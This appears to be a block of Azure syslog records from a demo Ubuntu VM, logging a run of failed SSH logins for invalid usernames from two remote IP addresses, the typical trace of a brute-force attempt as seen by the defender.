+12787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:48,UbuntuDevEnv,2019-06-26 03:55:47,auth,UbuntuDevEnv,info,Failed password for invalid user ik from 106.13.4.172 port 38064 ssh2,119802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ik,106.13.4.1,38064,,
+12788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:48,UbuntuDevEnv,2019-06-26 03:55:47,auth,UbuntuDevEnv,info,Disconnected from invalid user ik 106.13.4.172 port 38064 [preauth],119802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ik,106.13.4.1,38064,,
+12789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:55:48,UbuntuDevEnv,2019-06-26 03:55:47,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 38064:11: Bye Bye [preauth],119802,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,38064,,
+12790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:22,UbuntuDevEnv,2019-06-26 03:56:22,auth,UbuntuDevEnv,info,Invalid user nagios from 118.24.131.236 port 36452,119934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,118.24.131.2,36452,,
+12791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:22,UbuntuDevEnv,2019-06-26 03:56:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:22,UbuntuDevEnv,2019-06-26 03:56:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,119934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:23,UbuntuDevEnv,2019-06-26 03:56:22,auth,UbuntuDevEnv,info,Invalid user teamspeak from 106.13.4.172 port 42934,119938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,106.13.4.1,42934,,
+12794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:23,UbuntuDevEnv,2019-06-26 03:56:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,119938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:23,UbuntuDevEnv,2019-06-26 03:56:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,119938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:25,UbuntuDevEnv,2019-06-26 03:56:24,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 118.24.131.236 port 36452 ssh2,119934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,118.24.131.2,36452,,
+12797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:25,UbuntuDevEnv,2019-06-26 03:56:24,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 36452:11: Bye Bye [preauth],119934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,36452,,
+12798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:25,UbuntuDevEnv,2019-06-26 03:56:24,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 118.24.131.236 port 36452 [preauth],119934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,118.24.131.2,36452,,
+12799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:25,UbuntuDevEnv,2019-06-26 03:56:24,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak from 106.13.4.172 port 42934 ssh2,119938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,106.13.4.1,42934,,
+12800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:25,UbuntuDevEnv,2019-06-26 03:56:25,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak 106.13.4.172 port 42934 [preauth],119938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,106.13.4.1,42934,,
+12801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:56:25,UbuntuDevEnv,2019-06-26 03:56:25,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 42934:11: Bye Bye [preauth],119938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,42934,,
+12802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:02,UbuntuDevEnv,2019-06-26 03:57:01,auth,UbuntuDevEnv,info,Invalid user clamav from 106.13.4.172 port 47796,120074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,106.13.4.1,47796,,
+12803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:02,UbuntuDevEnv,2019-06-26 03:57:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:02,UbuntuDevEnv,2019-06-26 03:57:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:04,UbuntuDevEnv,2019-06-26 03:57:04,auth,UbuntuDevEnv,info,Failed password for invalid user clamav from 106.13.4.172 port 47796 ssh2,120074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,106.13.4.1,47796,,
+12806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:04,UbuntuDevEnv,2019-06-26 03:57:04,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 47796:11: Bye Bye [preauth],120074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,47796,,
+12807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:04,UbuntuDevEnv,2019-06-26 03:57:04,auth,UbuntuDevEnv,info,Disconnected from invalid user clamav 106.13.4.172 port 47796 [preauth],120074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,106.13.4.1,47796,,
+12808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:40,UbuntuDevEnv,2019-06-26 03:57:40,auth,UbuntuDevEnv,info,Invalid user prakash from 106.13.4.172 port 52666,120209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prakash,106.13.4.1,52666,,
+12809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:40,UbuntuDevEnv,2019-06-26 03:57:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:40,UbuntuDevEnv,2019-06-26 03:57:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:43,UbuntuDevEnv,2019-06-26 03:57:42,auth,UbuntuDevEnv,info,Failed password for invalid user prakash from 106.13.4.172 port 52666 ssh2,120209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prakash,106.13.4.1,52666,,
+12812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:43,UbuntuDevEnv,2019-06-26 03:57:43,auth,UbuntuDevEnv,info,Disconnected from invalid user prakash 106.13.4.172 port 52666 [preauth],120209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prakash,106.13.4.1,52666,,
+12813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:43,UbuntuDevEnv,2019-06-26 03:57:43,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 52666:11: Bye Bye [preauth],120209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,52666,,
+12814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:49,UbuntuDevEnv,2019-06-26 03:57:49,auth,UbuntuDevEnv,info,Invalid user uftp from 118.24.131.236 port 49136,120243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,118.24.131.2,49136,,
+12815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:49,UbuntuDevEnv,2019-06-26 03:57:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,120243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:49,UbuntuDevEnv,2019-06-26 03:57:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:51,UbuntuDevEnv,2019-06-26 03:57:51,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 118.24.131.236 port 49136 ssh2,120243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,118.24.131.2,49136,,
+12818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:52,UbuntuDevEnv,2019-06-26 03:57:51,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 49136:11: Bye Bye [preauth],120243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,49136,,
+12819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:57:52,UbuntuDevEnv,2019-06-26 03:57:51,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 118.24.131.236 port 49136 [preauth],120243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,118.24.131.2,49136,,
+12820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:18,UbuntuDevEnv,2019-06-26 03:58:18,auth,UbuntuDevEnv,info,Invalid user ce from 106.13.4.172 port 57534,120351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ce,106.13.4.1,57534,,
+12821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:18,UbuntuDevEnv,2019-06-26 03:58:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:18,UbuntuDevEnv,2019-06-26 03:58:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:20,UbuntuDevEnv,2019-06-26 03:58:19,auth,UbuntuDevEnv,info,Failed password for invalid user ce from 106.13.4.172 port 57534 ssh2,120351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ce,106.13.4.1,57534,,
+12824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:20,UbuntuDevEnv,2019-06-26 03:58:20,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 57534:11: Bye Bye [preauth],120351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,57534,,
+12825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:20,UbuntuDevEnv,2019-06-26 03:58:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ce 106.13.4.172 port 57534 [preauth],120351,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ce,106.13.4.1,57534,,
+12826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:56,UbuntuDevEnv,2019-06-26 03:58:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:56,UbuntuDevEnv,2019-06-26 03:58:56,auth,UbuntuDevEnv,info,Invalid user ubuntu from 106.13.4.172 port 34162,120480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,106.13.4.1,34162,,
+12828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:56,UbuntuDevEnv,2019-06-26 03:58:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:58,UbuntuDevEnv,2019-06-26 03:58:58,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 106.13.4.172 port 34162 ssh2,120480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,106.13.4.1,34162,,
+12830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:59,UbuntuDevEnv,2019-06-26 03:58:58,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 34162:11: Bye Bye [preauth],120480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,34162,,
+12831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:58:59,UbuntuDevEnv,2019-06-26 03:58:58,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 106.13.4.172 port 34162 [preauth],120480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,106.13.4.1,34162,,
+12832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:22,UbuntuDevEnv,2019-06-26 03:59:21,auth,UbuntuDevEnv,info,Invalid user biao from 118.24.131.236 port 33602,120576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,biao,118.24.131.2,33602,,
+12833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:22,UbuntuDevEnv,2019-06-26 03:59:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.131.236,120576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.131.2,,0,
+12834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:22,UbuntuDevEnv,2019-06-26 03:59:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:24,UbuntuDevEnv,2019-06-26 03:59:23,auth,UbuntuDevEnv,info,Failed password for invalid user biao from 118.24.131.236 port 33602 ssh2,120576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,biao,118.24.131.2,33602,,
+12836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:24,UbuntuDevEnv,2019-06-26 03:59:23,auth,UbuntuDevEnv,info,Received disconnect from 118.24.131.236 port 33602:11: Bye Bye [preauth],120576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.131.2,33602,,
+12837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:24,UbuntuDevEnv,2019-06-26 03:59:23,auth,UbuntuDevEnv,info,Disconnected from invalid user biao 118.24.131.236 port 33602 [preauth],120576,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,biao,118.24.131.2,33602,,
+12838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:35,UbuntuDevEnv,2019-06-26 03:59:34,auth,UbuntuDevEnv,info,Invalid user aloko from 106.13.4.172 port 39030,120619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aloko,106.13.4.1,39030,,
+12839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:35,UbuntuDevEnv,2019-06-26 03:59:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
+12840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:35,UbuntuDevEnv,2019-06-26 03:59:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:37,UbuntuDevEnv,2019-06-26 03:59:36,auth,UbuntuDevEnv,info,Failed password for invalid user aloko from 106.13.4.172 port 39030 ssh2,120619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aloko,106.13.4.1,39030,,
+12842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:37,UbuntuDevEnv,2019-06-26 03:59:36,auth,UbuntuDevEnv,info,Disconnected from invalid user aloko 106.13.4.172 port 39030 [preauth],120619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aloko,106.13.4.1,39030,,
+12843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:59:37,UbuntuDevEnv,2019-06-26 03:59:36,auth,UbuntuDevEnv,info,Received disconnect from 106.13.4.172 port 39030:11: Bye Bye [preauth],120619,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.4.1,39030,,
+12844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:14,UbuntuDevEnv,2019-06-26 04:00:13,auth,UbuntuDevEnv,info,Invalid user suo from 106.13.4.172 port 43892,120799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suo,106.13.4.1,43892,,
+12845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:14,UbuntuDevEnv,2019-06-26 04:00:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:00:14,UbuntuDevEnv,2019-06-26 04:00:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.4.172,120799,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.4.1,,0,
